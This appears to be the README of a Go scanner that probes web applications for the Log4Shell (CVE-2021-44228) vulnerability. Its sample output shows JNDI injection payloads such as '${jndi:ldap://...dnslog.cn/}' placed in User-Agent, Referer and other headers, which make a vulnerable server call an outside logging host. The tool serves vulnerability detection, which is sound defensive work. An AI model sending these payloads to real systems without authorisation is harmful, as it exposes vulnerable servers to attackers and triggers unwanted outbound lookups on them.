(Written in Go because, you know, "write once, run anywhere.")
This is a simple tool that can be used to find vulnerable instances of log4j 1.x and 2.x (CVE-2021-44228) in installations of Java software such as web applications.
The scan tool currently checks for discover log4shell vulnerability.
Current feature of tools:
Cookies
, Content-Type
, URL Path
, User-Agent
, Headers
$ go run main.go --help
Usage of main:
-mode string
please usage mode [urlpath, header, useragent] (default "[urlpath, header, useragent, cookie, contents]")
-url string
please enter you url for scan (default "url")
$ go run main.go -mode=useragent -url=http://127.0.0.1:8080
[+++] Your domain generated : rfcbd0.dnslog.cn
[+++] Your session is : 1s16v8k8fmrmd5rljun51lmur4
[***] Payload : User-Agent:${jndi:ldap://rfcbd0.dnslog.cn/}
[---] Isn't to vulnerability CVE-2021-44228
#################### 0 ############################
[+++] Your domain generated : rfcbd0.dnslog.cn
[+++] Your session is : 1s16v8k8fmrmd5rljun51lmur4
[***] Payload : Referer:${jndi:ldap://rfcbd0.dnslog.cn/}
[---] Isn't to vulnerability CVE-2021-44228
#################### 2 ############################
[+++] Your domain generated : rfcbd0.dnslog.cn
[+++] Your session is : 1s16v8k8fmrmd5rljun51lmur4
[***] Payload : X-Api-Version:${jndi:ldap://rfcbd0.dnslog.cn/}
[***] DNS log result : [["rfcbd0.dnslog.cn","172.253.238.4","2021-12-16 14:45:19"]]
[***] Is Vulnerability to CVE-2021-44228 - [critical]
Install a Go compiler.
Run the following commands in the checked-out repository:
go run main.go -mode=header -url=https://www.example.com/
Or
go build -o main
(Add the appropriate .exe
extension on Windows systems, of course.)
$ go run main.go -mode=header -url=http://127.0.0.1:8080/
$ go run main.go -mode=useragent -url=http://127.0.0.1:8080/
$ go run main.go -mode=cookie -url=http://127.0.0.1:8080/
$ go run main.go -mode=urlpath -url=http://127.0.0.1:8080/
$ go run main.go -mode=contents -url=http://127.0.0.1:8080/
GNU General Public License, version 3
Ramin Farajpour Cami <ramin.blackhat@gmail.com>